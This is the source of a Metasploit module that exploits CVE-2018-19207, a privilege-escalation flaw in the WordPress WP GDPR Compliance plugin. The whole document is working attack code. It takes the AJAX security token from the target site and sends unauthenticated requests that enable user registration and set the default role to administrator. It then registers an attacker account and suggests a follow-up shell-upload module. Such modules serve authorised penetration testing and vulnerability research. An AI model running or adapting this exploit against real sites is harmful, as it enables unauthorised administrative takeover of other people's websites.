WordPress WP GDPR Compliance Plugin Privilege Escalation

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HTTP::Wordpress  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress WP GDPR Compliance Plugin Privilege Escalation',        'Description' => %q{          The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set          wordpress administration options by overwriting values within the database.          The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized          users to trigger handlers and make configuration changes because of a failure to do          capability checks when executing the 'save_setting' internal action.          WARNING: The module sets Wordpress configuration options without reading their current          values and restoring them later.        },        'Author' => [          'Mikey Veenstra (WordFence)', # Vulnerability discovery          'Thomas Labadie' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/'],          ['CVE', '2018-19207'],          ['WPVDB', '9144']        ],        'Notes' => {          'Stability' => [],          'Reliability' => [],          'SideEffects' => [CONFIG_CHANGES]        },        'DisclosureDate' => '2018-11-08'      )    )    register_options [      OptString.new('EMAIL', [true, 'Email for registration', nil]),      OptString.new('USER', [true, 'Username for registration', 'msfuser'])    ]    register_advanced_options [      OptString.new('WPEMAIL', [false, 'Wordpress Administration Email (default: no email modification)', nil])    ]  end  def check    check_plugin_version_from_readme('wp-gdpr-compliance', '1.4.3')  end  def set_wp_option(name, value, ajax_security)    res = send_request_cgi(      'method' => 'POST',      'uri' => wordpress_url_admin_ajax,      'vars_post' => {        'action' => 'wpgdprc_process_action',        'security' => ajax_security,        'data' => "{\"type\":\"save_setting\",\"append\":false,\"option\":\"#{name}\",\"value\":\"#{value}\"}"      }    )    res && res.code == 200  end  def run    print_status('Getting security token from host...')    wp_home_res = send_request_cgi(      'method' => 'GET',      'uri' => target_uri.path    )    unless wp_home_res && wp_home_res.code == 200      fail_with(Failure::UnexpectedReply, "Unable to access Wordpress: #{target_uri.path}")    end    ajax_security = wp_home_res.body[/"ajaxSecurity":"([a-zA-Z0-9]+)"/i, 1]    if datastore['WPEMAIL'].present? && (datastore['WPEMAIL'] =~ URI::MailTo::EMAIL_REGEXP)      print_warning("Changing admin e-mail address to #{datastore['WPEMAIL']}...")      unless set_wp_option('admin_email', datastore['WPEMAIL'], ajax_security)        print_error('Failed to change the admin e-mail address')        return      end    end    print_warning('Enabling user registrations...')    unless set_wp_option('users_can_register', '1', ajax_security)      print_error('Failed to enable user registrations')      return    end    print_warning('Setting the default user role type to administrator...')    unless set_wp_option('default_role', 'administrator', ajax_security)      print_error('Failed to set the default user role')      return    end    print_status("Registering #{datastore['USER']} with email #{datastore['EMAIL']}")    unless (datastore['EMAIL'] =~ URI::MailTo::EMAIL_REGEXP) && wordpress_register(datastore['USER'], datastore['EMAIL'])      print_error('Failed to register user')      return    end    vprint_good('For a shell: use exploits/unix/webapp/wp_admin_shell_upload')  endend